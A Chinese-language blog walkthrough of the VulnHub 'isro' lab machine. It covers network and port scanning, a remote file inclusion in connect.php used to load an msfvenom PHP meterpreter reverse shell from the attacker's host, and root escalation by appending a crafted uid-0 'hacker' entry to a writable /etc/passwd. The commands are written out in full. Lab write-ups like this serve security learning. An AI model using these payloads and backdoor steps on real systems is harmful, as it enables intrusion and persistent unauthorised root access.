vulnhub之isro的实践

admin 2020年9月13日17:01:54评论272 views字数 1034阅读3分26秒阅读模式

本周实践的是vulnhub的isro镜像,下载地址,https://download.vulnhub.com/ha/isro.zip,

首先做地址扫描,sudo netdiscover -r 192.168.137.0/24,

vulnhub之isro的实践

接着做端口扫描,sudo nmap -sS -sV -T4 -A -p- 192.168.137.80,

vulnhub之isro的实践

再来个目录文件爆破,sudo dirb http://192.168.137.80 -X .php,.txt,.zip,.html,

vulnhub之isro的实践

这个地方直接猜测http://192.168.137.80/connect.php有文件包含漏洞,一试还真有,案理说不该这么直接猜的,应该拿web漏洞扫描器扫出来,

vulnhub之isro的实践

不管这么多了,总之就是要利用这个漏洞,

在kali攻击机上做一个反弹shell脚本,

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.137.194 LPORT=4444 R > shell.php,

在kali攻击机上开启web文件下载服务,python -m SimpleHTTPServer,

在kali攻击机上开一个meterpretershell监听,

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.137.194
exploit

这就可以通过访问http://192.168.137.80/connect.php?file=http://192.168.137.194:8000/shell.php来制造反弹shell,

拿到meterpreter反弹shell后getuid查看,不是root,还需要继续提权,

vulnhub之isro的实践

先转成交互式的shell,

shell,python3 -c 'import pty;pty.spawn("/bin/bash")',

查看/etc/passwd,ls -la /etc/passwd,发现当前账户可写,

那就有招了,可以制作一个账户密码填进去,hacker/password,

制作密码,perl -le 'print crypt("password","salt")',

填到/etc/passwd里,echo "hacker:sa3tHJ3/KuYvI:0:0:hacker:/root:/bin/bash" >> /etc/passwd,

再切换账户,su hacker,再id查看,获取root权限完成,

vulnhub之isro的实践


  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年9月13日17:01:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之isro的实践https://cn-sec.com/archives/130909.html

发表评论

匿名网友 填写信息